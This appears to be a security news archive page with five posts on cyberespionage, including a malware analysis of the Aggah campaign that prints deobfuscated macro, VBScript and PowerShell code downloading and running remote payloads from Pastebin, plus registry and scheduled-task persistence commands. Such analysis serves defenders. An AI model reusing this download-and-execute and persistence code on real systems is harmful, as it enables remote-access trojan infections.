Category Archives: Cyberespionage

Romania is going to exclude Huawei from its 5G Network

Romania will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

Romania could be the last state in order of time to ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

The document was signed by Romania’s Klaus Iohannis and President Donald Trump during the visit of the Romanian President to Washington.

The two states “seek to avoid the security risks that accompany Chinese investment in 5G telecommunications networks”.

Iohannis is worried by the Huawei’s possible participation in the building of the country’s 5G network, he added that the Supreme Council of National Defence (CSAT) would discuss it.

“The Romanian and American delegations also signed a memorandum of understanding on Tuesday establishing the conditions that service providers will have to fulfil to be part of the network.” reads the AFP press.

“These include the obligation not to be under the control of a third country’s government, according to Romanian news website G4Media.”

Romanian Government decided to adopt the “5G strategy for Romania” in June, the technological revolution will create 250,000 jobs and will bring in 4.7 billion euros ($5.2 billion).

The Romanian Government is going to launch a call for tenders for the country’s 5G network in the fourth quarter of this year.

Initially, the government had no intention to ban Huawei but evidently decided to accept the request of President Trump to his allies to exclude the Chinese manufacturer from their infrastructure.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – Huawei, cyberespionage)


The post Romania is going to exclude Huawei from its 5G Network appeared first on Security Affairs.

The Evolution of Aggah: From Roma225 to the RG Campaign

The experts at Yoroi-Cybaze ZLab discovered a new wave of attacks linked to the cyber espionage campaign tracked as Roma225.


Few months ago we started observing a cyber operation aiming to attack private companies in various business sectors, from automotive to luxury, education, and media/marketing.  The attack attribution is still unclear but the large scale of the malicious activities has also been confirmed by Unit42, who reported attack attempt against government verticals too. 

The attacks are characterized by the usage of a Remote Access Trojan named “RevengeRat”, suggesting a possible, still unconfirmed and under investigation, connection with the Gorgon Group, a known mercenary APT group who ran cyber-espionage operations and who were involved in criminal activities too. 

Few weeks ago, Unit42 discovered another active campaign, compatible with the Roma225 one we tracked on December 2018, pointing to some interesting changes into the attackers TTPs.  Recently, we intercepted other attacks potentially related with this wider criminal operation. For this reason, Cybaze-Yoroi ZLab team decided to analyze this recent campaign in order to investigate the evolution of the Aggah threat.

Technical Analysis

The whole infection chain shows an interesting degree of sophistication, leveraging about seventeen stages: a non negligible number of steps putted in place to decouple the infection vector from the actual payload. The following info-graphics summarize the infection chain dissected in the sections below, starting from the weaponized Office document, initially delivered through malicious emails, to the final RevengeRAT payload.

Roma255 2.png

The Macro Dropper

Brief DescriptionXLS Macro dropper
Ssdeep768:kCSk3hOdsylKlgxopeiBNhZFGzE+ cL2kdAJ7evT8RsFbQ:kDk3hOdsylKlgxopeiBNhZFGzE+cL2kt

Table 1: Information about the RevengeRAT malicious macro dropper

All the infection starts with a malicious XLS document weaponized with an embedded macro. The VB code is polluted by a multitude of junk instructions and after a cleaning phase we isolated the essence of the malicious code.

  1. Public Function Workbook_Open()
  2. rgh1 = YUcIFcEAA(“tzo{h’o{{wA66ip”, “7”)
  3. rgh2 = YUcIFcEAA(“{5s€6”, “7”)
  4. rgh3 = YUcIFcEAA(“7O^7ixXmxmxm”, “5”)
  5. rgh = rgh1 + rgh2 + rgh3
  6. Shell rgh
  7. End Function
  8. Public Function YUcIFcEAA(Sg1NdPNeR As String, jxvMDn0vV As Integer)
  9. Dim PFc88so50 As Integer
  10. For PFc88so50 = 1 To Len(Sg1NdPNeR)
  11. Mid(Sg1NdPNeR, PFc88so50, 1) = Chr(Asc(Mid(Sg1NdPNeR, PFc88so50, 1)) – jxvMDn0vV)
  12. Next PFc88so50
  13. YUcIFcEAA = Sg1NdPNeR
  14. End Function

Code Snippet 1:  real core of the macro

Figure 2: Command used to start the infection

A quick and dirty manipulation of the script enabled us to easily bypass the code obfuscation techniques protecting the next stage of the infection: the invocation of a Microsoft HTML Application hosted in a remote location.

The macro has the only purpose to run the mshta command. As defined by the Mitre, “Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.” . 

The Hidden HTA

The malware retrieves the HTA application to run from a remote host behind the Bitly shortening service. The target page is the “rg.html”, downloaded from “https[://createdbymewithdeniss[ .blogspot[.com/p/rg[.html”. Even in this case, like in the Roma255 campaign, the attacker abused the Blogger platform to hide the malicious code in plain sight.

Figure 3: Fake Blogspot page

The page does not embed any binaries or malicious links, but navigating its source code, it reveals packed HTML code dynamically injected into the page during the rendering. 

Figure 4: Malicious code contained in the malicious “blogspot” site

This additional piece of script is specifically designed to be executed by the “mshta” utility. It is a VBScript code creating a “WScript.Shell” object, a particular object decisely not designed to be loaded into regular web browsers engines. 

  1. <script language=”VBScript”>
  2. Set Xkasdj2 = CreateObject(StrReverse(StrReverse(“WScript.Shell”)))
  3. Xa_aw1 = StrReverse(StrReverse(“h”)) + StrReverse(StrReverse(StrReverse(StrReverse(“t”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“t”)))) + StrReverse(StrReverse(“p”)) + StrReverse(“:”) + StrReverse(StrReverse(StrReverse(StrReverse(“/”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“/”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“w”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“w”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“w”)))) + StrReverse(StrReverse(“.”)) + StrReverse(StrReverse(“p”)) + StrReverse(StrReverse(“a”)) + StrReverse(StrReverse(“s”)) + StrReverse(StrReverse(StrReverse(StrReverse(“t”)))) + StrReverse(“e”) + StrReverse(“b”) + StrReverse(“i”) + StrReverse(“n”) + StrReverse(StrReverse(“.”)) + StrReverse(“c”) + StrReverse(“o”) + StrReverse(StrReverse(“m”)) + StrReverse(StrReverse(StrReverse(StrReverse(“/”)))) + StrReverse(“r”) + StrReverse(StrReverse(“a”)) + StrReverse(StrReverse(StrReverse(StrReverse(“w”)))) + StrReverse(StrReverse(StrReverse(StrReverse(“/”))))
  4. Xa_aw0 = StrReverse(StrReverse(“m”)) + StrReverse(StrReverse(“s”)) + StrReverse(StrReverse(“h”)) + StrReverse(StrReverse(StrReverse(StrReverse(“t”)))) + StrReverse(” a”)
  5. Xa_aw2 = “efZDG7aL”
  6. XXX = Xa_aw0 + Xa_aw1 + Xa_aw2
  7. Morg = XXX
  8. Xa_aw = Morg
  9. Xkasdj2.Run Xa_aw, vbHide
  10. self.close
  11. </script>

Code Snippet 2: Javascript code after “unescape” function

The VBScript code is obfuscated using a series of “StrReverse” functions. But the action it performs is still clearly evident: call another mshta process and execute a new HTA application hosted on Pastebin (hxxp[://pastebin[.com/raw/efZDG7aL).

Figure 5: Malicious code stored on pastebin

This other script is also encoded in hexadecimal format. After its decoding its  content can be divided into four parts. The first one is responsible for killing some of the Microsoft Office suite processes, like Word, Excel, Publisher and PowerPoint.

  1. “cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE”

Code Snippet 3: First deobfuscated piece of code

Instead, the second chunk hides the next malware stage invocation within a Powershell script.

  1. powershell.exe $LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,67,77,50,50,118,84,117,112,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,81,120,48,75,50,98,97,78,39,41,46,114,101,112,108,97,99,101,40,39,94,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX

Code Snippet 4: Second deobfuscated piece of code

This code snippet hides a Powershell executable stage encoded in numeric format. The correspondent ASCII text is then executed through the IEX command-let.

  1. [void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin[.com/raw/CM22vTup’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin[.com/raw/Qx0K2baN’).replace(‘^’,’0x’)|IEX;[k.Hackitup]::exe(‘MSBuild.exe’,$f)

Code Snippet 5: Deobfuscated powershell function

This code builds up the core of the malware implant (discussed in the next section). The third chunk of the code, instead, is where the attacker sets two different persistence mechanisms. Both of them invokes two different HTA application retrieved from Pastebin:

  • The first persistency method is the classic “Run” registry key.
  1. Set Xm_w = CreateObject(“WScript.Shell”)
  2. L_Xe = “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate”
  3. Xm_w.RegWrite L_Xe,”mshta.exe http://pastebin[.com/raw/bMJxXtXa”,”REG_EXPAND_SZ”

Code Snippet 6: Third deobfuscated piece of code (part 1)

  • The second persistency method abuses scheduled tasks. 
  1. Set Mi_G = CreateObject(StrReverse(StrReverse(“WScript.Shell”)))
  2. Dim We_wW
  3. We_wW0 = StrReverse(“t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs”)
  4. We_wW1 = “n “”Windows Update”” /tr “”mshta.ex”
  5. We_wW2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m” + “/” + “r” + “a” + “w” + “/tuGAsMze”” /F “
  6. We_wW = We_wW0 + We_wW1 + We_wW2
  7. Mi_G.Run We_wW, vbHide

Code Snippet 7:  Third deobfuscated piece of code (part 2)

Both of the scripts are stored onto Pastebin platform and even if  the first one has been removed, the malware maintains its persistence thanks to the execution of the second method.

The last chunk of code, the fourth, contains a huge number of Registry keys ready to be set on the target machine. This behavior has been implemented to drastically reduce the defenses of the target host, for instance disabling security features oft the Microsoft Windows and the Office ecosystem. The “Edited Registry Keys” section reports them.

The Hagga Pastes

As stated in the previous section, the Code Snippet 5 contains the core of malicious actions. The malware concurrently downloads and executes powershell code from two pastes. The first one is “CM22vTup” and have been published by a Pastebin user named “HAGGA”, the same reported in the PaloAlto analysis.

Figure 6: New payload downloaded from Pastebin

As previously hinted the Powershell code in the “CM22vTup” snippet encodes its payload in numeric format. Decoding “PAYLOAD-1“, another obfuscated Powershell script reveals the loading of a shellcode directly in the running process memory. 

  1. $jk=@(PAYLOAD-1);$p=[System.Text.Encoding]::ASCII.GetString($jk)|IEX

Code Snippet 8: Code structure of the downloaded script

  1. [Byte[]]$sc64=iex(‘PAYLOAD_2’.replace(‘%_’,’0x’));$a = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,’Load’,[Microsoft.VisualBasic.CallType]::Method,$sc64)

Code Snippet 9: Structure of the script contained in “PAYLOAD_1”

After a basic manipulation, The data hidden in “PAYLOAD_2” results to be the hexadecimal representation of a PE file, easily recognizable due to the characteristic ”4D 5A” header. 

  1. %_4D,%_5A,%_90,%_00,%_03,%_00,%_00,%_00,%_04,%_00,%_00,%_00,%_FF,%_FF,%_00,%_00,%_B8,%_00,%_00,%_00,%_00,%_00, […..]

Code Snippet 10: “PAYLOAD_2” in hex encoding

This PE 32 file is a well formed .Net assembly. In the following table are shown the static information about it. 

ThreatRevengeRAT / Injector 
Brief DescriptionRevengeRAT / injector payload Obfuscated
Ssdeep768:zQosoqOovPJmzW0GzJrMfogNeEbSBUrOaqVJswUna4OI 9O:zQyoUzW0GrQ6UiaqVJ1Ua4Vs

Table 2: Information about the RevengeRAT / Injector malicious payload

Figure 7: Static information about payload described in table 2  

However, the .Net payload is not totally unprotected. In  fact it has been obfuscated with the “ConfuserEx” obfuscator.

The assembly is a Dynamic Linked Library with only one purpose: inject the payload into a target process through the well known “Process Hollowing” technique. At this stage of the infection chain the final payload could be retrieved, the RevengeRAT remote administration tool.

Figure 8: Process Hollowing references inside the PE file

The RevengeRAT Payload

Figure 9: RevengeRAT payload in hex encoding

The final payload is the one downloaded from the Pastebin page “Qx0K2baN”, as reported in Code Snippet 5. This code comes with the same obfuscation method seen in PAYLOAD_2, hex encoding together with a simple replacing routine.

Brief DescriptionRevengeRAT injector payload Obfuscated
Ssdeep768:3Yo9AzKlOOYIl+tqRsoYGvoJGPdyOYOCbf9eThI21Os+ JZiIPxTS0X4Dwrw2T9:5AmlEIl+tqSoY2oyfYOweT6s+JlPVnz

Table 4: Information about the RevengeRAT malicious payload

Even this executable is a well formed .Net Assembly, but in this case it is obfuscated with another tool, “.Net Reactor”, a commercial code protection tool specialized in .Net applications.

Figure 10: Evidence about .NET Reactor obfuscator

Exploring the code, we found many similarities with the same RevengeRAT threat previously analyzed by us and by Unit 42. This means, with reasonable confidence, the campaign we are dissecting could be an evolution of the previous campaigns, showing an increase of the malware stealthiness and the adoption of new techniques like process hollowing in the infection chain. Despite that, the RevengeRAT core is substantially the same.

Figure 11: Comparison among RevengeRAT belonging to different campaigns

This time the recurring word is “rg”. In fact the two payloads download from the pastebin platform are “rgrunpe” and “rgbin”; also the new command and control server domains starts with the two letters “rg”, the codename of this last campaign. This time, despite the “roma225” case, the socket key of the rat is configured differently with the static string “lunlayo” and the id is “HOTEIS NOVOS” instead of “POWERScreenPOWER”.

Anyway, as shown in Figure 11, the ID and Mutex of the last two campaigns are the same, indicating the fact that the group is active and the infection campaign continues. Moreover, considering the number of views counted by the Pastebin snippet “CM22vTup”, the one delivering the RevengeRAT payload, is possible to estimate the magnitude of the attack, which may involve up to 1600 victims.

Figure 12: Hagga campaign reference


Since December 2018, we are following the tracks of this ambiguous cyber criminal group, internally referenced as TH-173. There are chances this whole activity could be linked with the Gorgon Group, but at the moment we have no definitive evidence of this connection.

Anyway, through the constant eyes on this threat, we observed a refinement in their infection chain while they are maintaining intact some of their TTP, such as the abuse of the Blogspot platform and legit dynamic DNS services. In fact, the group started abusing Pastebin to add complexity into the infection chain, mixing up hidden MSHTA code, Powershell scripts and also additional process injection techniques to their arsenal.

Technical details, including Indicator of compromise and Yara rules are reported in the  on the Yoroi blog:

Pierluigi Paganini

(Security Affairs – Roma225, hacking)

The post The Evolution of Aggah: From Roma225 to the RG Campaign appeared first on Security Affairs.

German firms BASF, Siemens, Henkel hit by cyber attacks

A new wave of cyber attacks carried out by a China-linked APT group hit German blue-chip companies BASF, Siemens, Henkel and others.

On Wednesday, German blue-chip companies BASF, Siemens, Henkel along with a host of others confirmed they had been targeted by a wave of cyber attacks. German media reported that the cyber attacks were launched by China-linked cyberespionage group.

According to the German broadcaster ARD, the systems at the companies were infected with the Winnti backdoor.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Siemens China surveillance app

Recently Chronicle researchers while investigating the cyber attack that hit the Bayer pharmaceutical company in April spotted a Linux variant of the Winnti backdoor.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns.  The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

According to the Reuters agency, the hackers also targeted other firms, including Roche and airline Lion Air.

“Alongside the German firms named, companies including drug maker Roche, hotels group Marriott, airline Lion Air, conglomerate Sumitomo, and chemicals group Shin-Etsu were also targeted by the hackers, ARD reported.” reported the Reuters agency.

Siemens, Henkel and Roche blamed “Winnti” malware for the infections, while BASF and Covestro only confirmed that they have been victims of cyber attacks.

“All said that no sensitive information was lost, while none of the companies commented on whether the attacks had been launched by Chinese hackers.” continues the Reuters.

Other victims of the attacks, including Shin-Etsu, Sumitomo, Lion Air, Marriott and Valve have yet to comment the attacks.

In April, Bayer announced that it was victim of cyber attacks launched by China-linked APT group, the activity of this specific threat actor against Bayer was first spotted in early 2018 and according to the experts the hackers remained inside the company networks until late last month.

There was also a Winnti attack on computer systems at German technology group ThyssenKrupp in 2016, according to media reports at the time.

In 2016, the hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

The hackers launched a “massive cyber attack” against the divisions dealing with orders planning of industrial plants, the conglomerate’s Industrial Solutions, and Steel Europe business divisions.

Pierluigi Paganini

(SecurityAffairs – China Linked APT, Winniti)

The post German firms BASF, Siemens, Henkel hit by cyber attacks appeared first on Security Affairs.

Czech public radio says Huawei Czech Unit secretly collected data

New problems for Huawei, the Czech unit of telecoms giant secretly collected personal data customers, officials and business partners.

Huawei made the headlines again, according to the Czech public radio the Czech unit of Chinese telecoms giant secretly collected personal data of customers, officials, and business partners.

The radio cited two former Huawei managers as the source, the duo speaking on condition of anonymity revealed that Huawei required them to enter the data into computer systems that could be accessed from China.

“Managers who worked for the company for many years told our reporters that they had been forced to enter people’s personal data into a system that was separate from commercial data,” states the report.

The managers explained that the information collected by the company included the number of children, financial situation, and hobbies of persons of interest. 

“Access to this information in the Customer Relationship Management (CRM) system is only managed by Huawei headquarters in China,” revealed one of managers.

According to the AFP press, Czech unit declared that it was in compliance with the EU’s General Data Protection Regulation (GDPR).

In December 2018, the Czech National Cyber and Information Security Agency warned against using the equipment manufactured by Chinese firms Huawei and ZTE because they pose a threat to state security.

The main issue is a legal and political environment of the People’s Republic of China, where (the) aforementioned companies primarily operate,” reads a statement issued by the Czech National Cyber and Information Security Agency.

“China’s laws, among other things, require private companies residing in China to cooperate with intelligence services, therefore introducing them into the key state systems might present a threat,” 

According to the Czech News Agency (CTK), the Czech branch of the Chinese Telco giant Huawei refused any accusation and asked the agency to offer proof of the alleged espionage activities for the Chinese intelligence. 

“The warning comes on the heels of a Czech intelligence report which warned about increased spying activities of Chinese diplomats in the EU and NATO member state of 10.6 million people.” reported the AFP press.

The US first, and many other countries after, have decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government was urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

The Chinese firm was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Huawei Dutch intelligence

The United States first highlighted the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban the company.

Anyway, some countries in Europe decided to not exclude Huawei from building national 5G networks, such as Germany and the UK.

Europeans are divided on the issue, with Germany having in principle accepted Huawei’s participation in the construction of its 5G network.

Pierluigi Paganini

(SecurityAffairs – Huawei, cyberspionage)

The post Czech public radio says Huawei Czech Unit secretly collected data appeared first on Security Affairs.

Turla APT group adds Topinambour Trojan to its arsenal

Kaspersky researchers revealed that since earlier this year, Russia-linked APT group Turla used new variants of the KopiLuwak Trojan in targeted attacks.

Security experts at Kaspersky revealed that the Russia-linked APT group Turla used new variants of the KopiLuwak Trojan in targeted attacks since early 2019.

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

In the past months, security experts reported the APT group has been updating its arsenal. In May, ESET experts revealed that Turla has been using a sophisticated backdoor, dubbed LightNeuron, to hijack Microsoft Exchange mail servers.

Now Kaspersky published a detailed analysis of a new modular tool dubbed Topinambour (aka Sunchoke – the Jerusalem artichoke). Kaspersky researchers also found .NET and PowerShell versions of the KopiLuwak Trojan that was involved in targeted attacks since the beginning of this year. 

Topinambour is spread via tainted legitimate software installers, the dropper includes a tiny .NET shell that is used to deliver commands to the target machine and deliver other modules via SMB.

“Using this and SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules using just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through public networks.” reads the analysis published by Kaspersky.

“These campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with “197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”

The dropper sample analyzed by the experts is able to deliver the payload to a specific location, gain persistence for the malicious code with a scheduled task that starts every 30 minutes, and drop the original application the dropper tries to mimic. 

The tiny .NET shell dropped on the target system connects the C2 server and fetches the KopiLuwak dropper, that gains persistence and drops a JavaScript file that leads to the final stage Trojan.

Recent operations also involved another .NET Trojan along with the KopiLuwak JavaScript, it was called RocketMan and supports commands to download/upload a file, and to halt the Trojan activity. 

Hackers also used a PowerShell Trojan tracked as MiamiBeach, it differs from the RocketMan Trojan due to its ability to take a screenshot.

“The reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize detection of the well-knownpublicly discussed JavaScript versions.” concludes Kaspersky.

“Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer, where only a tiny starter would be left,”

Pierluigi Paganini

(SecurityAffairs – Turla APT, Topinambour)

The post Turla APT group adds Topinambour Trojan to its arsenal appeared first on Security Affairs.